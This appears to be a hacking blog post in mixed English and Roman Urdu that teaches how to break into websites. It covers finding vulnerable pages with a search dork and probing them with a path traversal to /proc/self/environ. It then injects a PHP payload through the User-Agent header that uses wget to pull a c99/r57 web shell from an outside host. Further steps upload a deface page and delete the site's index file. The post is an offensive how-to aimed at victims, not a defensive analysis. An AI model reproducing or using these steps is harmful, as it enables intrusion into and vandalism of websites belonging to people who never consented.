Tut:Remote File Inclusiom (RFI).
Wht u need.
N0-1 mozilla firefox.
N0-2 tamper data.(its firfox addon Google it).
N0-3 A shell (recommended r57 or c99 google it).Upload it on fre hosting as .Txt.
Par mai kuch yahan upload karta hn ap b yahan karo sai rahe ga see step 4.
N0-4 A account on drivehq.Com.And their upload ur shel as .Txt.
N0-5 A vuln web and little brain.
Lets start.

Dork :.Php?Page-contact.Php
kafi site milae ge par vuln buhat kam its ur luck.Patience rakho ge mil jai ge vuln web.

Nw web jo select ke us k akhr mai yae hoga  /page=career.Php.
Then replace after page= with ths
../../../../../../../../../proc/self/environ
(../ yae apne marzi se torae zada dal dijai ga 10 12).
Ur link will be like ths
www.Web.Com/page=../../../../../../../proc/self/environ
jaise enter karen ge web par ek ajeeb code ajai ga.Agar yae code iya tou web vuln h..Ap agae kam karo.Code nh iya tou next web par try karo.

Jaise bola tha kahin apka shel upload hona chayae .Txt format mai.Mai drivehq par karta hn.Lfi string bnate hain.
Nw lfi string would be
<?system('wget http://www.Web.Com/shel.Txt -o shell.Php');?>
is mai www.Web.Com/shel.Txt apka shel link h.Ja han apne shel upload kia ho.Mai jb karta tha drive hq use karta hn.

Oka.Lfi string note pad mai likhna then.Jahan Code araha tha(../../ yae likhne k bd)  wahan us page par option mai ja kar tamper data on karo.Then tamper data mai click on start tamper.Ek dum window i ge wahan click karna tamper par.

Tamper par click k bd ek aur window khule ge wahan USER AGENT mai wo jo lfi string tha dal daina..Lfi string paste kardaina.
Phr oka par click.Phr stop temper data par click kardaina ya bnd kardaina.
You have done it.
Www.Site.Com/shell.Php kholo ge tmra shell execute hojai ga web par..
Bingo. . . .
Nw enjoy hacking and brust ur victim.

Chalo deface kartae hain.Make sure shel par yae likha i public§html.
Nh tou executing comand se is directory mai jana.Waise phelay se is he mai hoge.
Upload ka option hoga shel mai. index.Html k nam se deface page daldo.
Chck karo upload hua ya nh.
Www.Site.Com/index.Html.Agar deface page khule
then shell sari files dikha raha hoga.Index nam ke file dhundna aur delet kar daina.Phr tmra deface page yahan i ga.
Www.Site.Com
End. . . . .

Post a Comment

 
Top